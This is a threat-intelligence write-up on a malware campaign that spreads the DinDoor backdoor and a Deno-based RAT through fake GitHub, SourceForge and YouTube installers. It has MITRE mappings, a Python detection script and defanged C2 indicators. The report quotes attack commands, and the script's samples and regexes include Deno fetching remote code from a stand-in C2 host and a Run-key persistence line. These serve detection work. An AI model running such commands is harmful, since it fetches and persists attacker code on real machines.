Attackers are abusing GitHub, SourceForge, and compromised YouTube channels to distribute fake installers and plugins impersonating popular software such as ChatGPT, Claude, AutoTune, and Kontakt. The campaign delivers DinDoor and a Deno-based RAT that uses alternative JavaScript runtimes, Scoop, and WinGet to install payloads, steal data, and hide traffic through Microsoft Edge. #DinDoor #Deno #GitHub #SourceForge #YouTube #Scoop #WinGet #MicrosoftEdge
Keypoints
- Threat hunters identified fake installers and plugins on GitHub and SourceForge that impersonate popular software to lure victims.
- Compromised YouTube channels are used to promote malicious links, with some videos reaching more than 50,000 views.
- The infection chain often starts with MSI files or PowerShell scripts that download and execute further stages.
- The campaign installs Deno through Scoop or WinGet and then uses Deno to run a backdoor known as DinDoor.
- DinDoor can establish persistence, contact C2 servers, and deliver additional malware payloads, including a Deno-based RAT.
- The RAT can exfiltrate browser, wallet, Telegram, Discord, clipboard, screenshot, and file data, and supports VNC and SOCKS5 over WebSocket.
- Attackers are also abusing Microsoft Edge in a peer-to-peer streaming mode to conceal malicious traffic and reduce detection.
MITRE Techniques
- [T1195.002] Compromise Software Supply Chain – Attackers abused legitimate-looking GitHub and SourceForge projects to deliver fake installers and plugins, misleading users into installing malicious files [‘fake installers and plugins on GitHub and SourceForge’]
- [T1105] Ingress Tool Transfer – The malware downloaded MSI files and follow-on JavaScript payloads from remote repositories and C2 endpoints [‘downloads the MSI from GitHub’ / ‘downloads the next stage’]
- [T1059.001] PowerShell – PowerShell scripts were used to launch the infection chain, install software, and execute payloads [‘execute a malicious command’ / ‘the PowerShell script takes care of’]
- [T1059.007] JavaScript – Deno was used to execute JavaScript payloads for the backdoor and RAT [‘the Deno JavaScript runtime’ / ‘run -A http://{C2}/{random_path}.js’]
- [T1218.007] Msiexec – The malicious MSI was installed using the Windows installer utility [‘msiexec /i %temp%s.msi’]
- [T1574.009] Path Interception by PATH Environment Variable – The infection chain leveraged package managers and installed components in user-controlled locations to facilitate execution [‘installs Deno via WinGet or Scoop if not present’]
- [T1547.001] Registry Run Keys / Startup Folder – Persistence was achieved by creating a Run key that launches the downloader again [‘create a RUN key that executes the downloader “launcher-1”’]
- [T1106] Native API – The malware used native browser and system functionality through CDP and WebSocket-enabled components to control the victim environment [‘connects to it via Chrome DevTools Protocol (CDP)’]
- [T1027] Obfuscated Files or Information – Config data was Base64-encoded to conceal parameters and tokens [‘The config data is Base64-encoded’]
- [T1041] Exfiltration Over C2 Channel – Stolen data was sent back through HTTP and WebSocket C2 endpoints [‘receive config parameters, task delivery, results, and exfiltrated data’]
- [T1090.001] Internal Proxy – The RAT established SOCKS5 proxy tunnels over WebSocket [‘Establish SOCKS5 proxy tunnels over WebSocket’]
- [T1021.005] VNC – The RAT provided full bidirectional control through a custom VNC implementation over WebSocket [‘Full bidirectional control through a custom VNC implementation over WebSocket’]
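As an added defender-side example (not code from the report, the campaign, or any vendor), the following Python classifies constructed Windows process-creation events against the launch patterns quoted above: msiexec installing an MSI from %temp%, a scripted WinGet or Scoop install of Deno, Deno running a remote .js module with `-A`, and a Run key value that launches Deno. The event field names, the sample command lines and the `c2.example.invalid` host are assumptions.

```python
import re

# Constructed sample process-creation events, not taken from the report. Fields are
# what a SIEM would normalise from a Windows process-creation record (e.g. Sysmon ID 1).
SAMPLE_EVENTS = [
    {"parent": "powershell.exe", "image": "msiexec.exe",
     "cmdline": r"msiexec /i C:\Users\u\AppData\Local\Temp\s.msi /qn"},
    {"parent": "powershell.exe", "image": "winget.exe",
     "cmdline": "winget install DenoLand.Deno --accept-source-agreements"},
    {"parent": "powershell.exe", "image": "deno.exe",
     "cmdline": "deno run -A http://c2.example.invalid/a1b2c3.js"},
    {"parent": "powershell.exe", "image": "reg.exe",
     "cmdline": r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v launcher-1 /d "deno run -A http://c2.example.invalid/x.js"'},
    {"parent": "explorer.exe", "image": "deno.exe",
     "cmdline": r"deno run --allow-net C:\dev\app\main.ts"},
    {"parent": "explorer.exe", "image": "msiexec.exe",
     "cmdline": r"msiexec /i C:\Downloads\vendor-setup.msi"},
]

# Deno executing a remote .js module with all permissions (-A / --allow-all),
# the launch pattern the report quotes as 'run -A http://{C2}/{random_path}.js'.
REMOTE_MODULE = re.compile(
    r"\bdeno(?:\.exe)?\s+run\b.*\s(?:-A|--allow-all)\b.*\s(https?://\S+\.js)\b", re.I)
# msiexec installing an MSI dropped in %temp% (the report's 'msiexec /i %temp%s.msi').
TEMP_MSI = re.compile(r"msiexec(?:\.exe)?\s+/i\s+\S*(?:%temp%|\\Temp\\)\S*\.msi", re.I)
# Scripted Deno installation through WinGet (package id DenoLand.Deno) or Scoop.
DENO_INSTALL = re.compile(r"\b(?:winget\s+install\s+DenoLand\.Deno|scoop\s+install\s+deno)\b", re.I)
# A Run key value whose command launches Deno (the report's 'launcher-1' persistence).
RUN_KEY_DENO = re.compile(r"CurrentVersion\\Run\b.*\bdeno\b", re.I)

def classify(event):
    """Return the list of detection tags that fire for one process-creation event."""
    image, parent, cmd = (event["image"].lower(), event["parent"].lower(), event["cmdline"])
    from_shell = parent == "powershell.exe"
    tags = []
    if image == "deno.exe" and REMOTE_MODULE.search(cmd):
        tags.append("deno_remote_module_all_permissions")
    if image == "msiexec.exe" and from_shell and TEMP_MSI.search(cmd):
        tags.append("powershell_msiexec_temp_msi")
    if from_shell and DENO_INSTALL.search(cmd):
        tags.append("scripted_deno_install")
    if image == "reg.exe" and RUN_KEY_DENO.search(cmd):
        tags.append("run_key_launches_deno")
    return tags

def hunt(events):
    """Return (image, tags) for every event that triggers at least one detection."""
    return [(e["image"], tags) for e in events if (tags := classify(e))]
```

Running `hunt(SAMPLE_EVENTS)` flags the four scripted events and leaves the two interactive, locally sourced launches untouched; a real deployment would tune the parent-process condition to whatever launcher the environment's telemetry actually shows.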
Indicators of Compromise
- [URLs] Malicious repositories and project pages used for distribution – https[:]//github.com/claude-free-plugin/, https[:]//sourceforge.net/projects/gearup/, and other listed GitHub/SourceForge URLs
- [Domains] Distribution and C2 infrastructure – claudescript[.]top, ms-telemetry-gateway-us[.]com, and other listed domains such as cf-proxy[.]cloud-analytics-services[.]workers.dev
- [IPs] C2 servers – 23[.]227[.]196[.]107, 45[.]137[.]99[.]121, and other listed IPs including 193[.]233[.]198[.]132
- [File names] Malicious installers and scripts – install.msi, s.msi, and {Random name}.ps1
- [File paths / endpoints] C2 and stage-fetching paths – /security-pool, /v2{ID}.js, /health, /token, and /vnc/agent/
- [Software / package identifiers] Payload delivery and installation targets – DenoLand.Deno, Scoop, WinGet, and build note BWR